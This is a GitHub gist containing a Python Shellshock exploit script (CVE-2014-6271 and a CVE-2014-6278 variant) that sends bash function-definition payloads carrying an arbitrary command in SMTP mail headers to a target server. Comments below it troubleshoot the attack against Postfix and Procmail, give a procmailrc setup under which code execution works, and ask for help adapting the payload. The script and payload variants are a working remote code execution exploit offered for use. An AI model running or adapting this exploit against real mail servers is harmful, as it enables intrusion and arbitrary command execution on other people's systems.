-
-
Save claudijd/33771b6c17bc2e4bc59c to your computer and use it in GitHub Desktop.
| #!/bin/python | |
| # Exploit Title: Shellshock SMTP Exploit | |
| # Date: 10/3/2014 | |
| # Exploit Author: fattymcwopr | |
| # Vendor Homepage: gnu.org | |
| # Software Link: http://ftp.gnu.org/gnu/bash/ | |
| # Version: 4.2.x < 4.2.48 | |
| # Tested on: Debian 7 (postfix smtp server w/procmail) | |
| # CVE : 2014-6271 | |
| from socket import * | |
| import sys | |
| def usage(): | |
| print "shellshock_smtp.py <target> <command>" | |
| argc = len(sys.argv) | |
| if(argc < 3 or argc > 3): | |
| usage() | |
| sys.exit(0) | |
| rport = 25 | |
| rhost = sys.argv[1] | |
| cmd = sys.argv[2] | |
| headers = ([ | |
| "To", | |
| "References", | |
| "Cc", | |
| "Bcc", | |
| "From", | |
| "Subject", | |
| "Date", | |
| "Message-ID", | |
| "Comments", | |
| "Keywords", | |
| "Resent-Date", | |
| "Resent-From", | |
| "Resent-Sender" | |
| ]) | |
| s = socket(AF_INET, SOCK_STREAM) | |
| s.connect((rhost, rport)) | |
| # banner grab | |
| s.recv(2048*4) | |
| def netFormat(d): | |
| d += "\n" | |
| return d.encode('hex').decode('hex') | |
| data = netFormat("mail from:<>") | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = netFormat("rcpt to:<root@localhost>") | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = netFormat("data") | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = '' | |
| for h in headers: | |
| # Original | |
| data += netFormat(h + ":() { :; };" + cmd) | |
| # Variant 1 - CVE-2014-6271 | |
| #data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ") | |
| # Variant 2 - CVE-2014-6278 | |
| #data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :") | |
| data += netFormat(cmd) | |
| # <CR><LF>.<CR><LF> | |
| data += "0d0a2e0d0a".decode('hex') | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = netFormat("quit") | |
| s.send(data) | |
| s.recv(2048*4) |
Just tested on the following, still no code exec, but I can confirm that my .procmailrc is processing the email fully and foldering it on a non-root user.
$ cat ~/.procmailrc
VERBOSE=yes
MAILDIR=$HOME/Procmail
LOGFILE=$PMDIR/log
INCLUDERC=$PMDIR/test.rc
INCLUDERC=$PMDIR/lists.rc
:0:
* ^Subject:.*
testing
$ cat /etc/postfix/main.cf | grep mailbox_command
mailbox_command = /usr/sbin/procmail -a "$EXTENSION"
Bash = 4.1.2(1)
Postfix = 2.6.6
Procmail = 3.22
I also experimented with allowing postfix to have a default shell of /bin/bash
python exploit.py 192.168.10.# 'touch /tmp/vulnerable'
RESULT: the above test seems like it should work, but no code execution.
Also tested with a formail config...
:0:
* ^Subject:.*
| formail
RESULT: appears to process the mail fine, logs show formail execution, still not code execution of user supplied bash PoC headers.
Ok, finally got this working...
If a user is using a .procmailrc and using formail to export specific header attributes from the email, it's possible for an attacker to obtain code execution via the email headers set in the original PoC assuming the target address is modified to that of a valid user.
Here's a viable example I used to verify code execution in a Postfix + Procmail + Formail combination...
VERBOSE=yes
PATH=/bin:/usr/bin:/usr/local/bin
SHELL=/bin/bash
MAILDIR=$HOME/mail
PMDIR=$HOME/Procmail
LOGFILE=$PMDIR/log
INCLUDERC=$PMDIR/test.rc
INCLUDERC=$PMDIR/lists.rc
SHELL=/bin/sh
SUBJECT=`formail -xSubject:`
FROM=`formail -rt -xTo:`
:0:
* ^Subject:.*
| (formail)
Hi, very good post.
The format I'm trying exploit is slightly different.
Can you explain how to generate the payload according to the format?
# Original
data += netFormat(h + ":() { :; };" + cmd)
# Variant 1 - CVE-2014-6271
#data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ")
# Variant 2 - CVE-2014-6278
#data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :")
OUTDATED - SEE BELOW
I've tested the original and the two variants without success.
Here are the relevant specs from my setup:
Bash - 4.2.37(1) (reportedly 4.2.x < 4.2.48 are vulnerable in this context)
Postfix - 3.9.6
Procmail - 3.22
Postfix config details (default from apt-get on Kali):
mailbox_command = procmail -a "$EXTENSION"
Logs show the email as being accepted and the procmail process is run against it without any failures.
The command I'm testing with is as follows:
python exploit.py 192.168.10.170 'touch /tmp/vulnerable'
RESULT: the above test case was a bust on Ubuntu/Kali because they symlink bash to dash.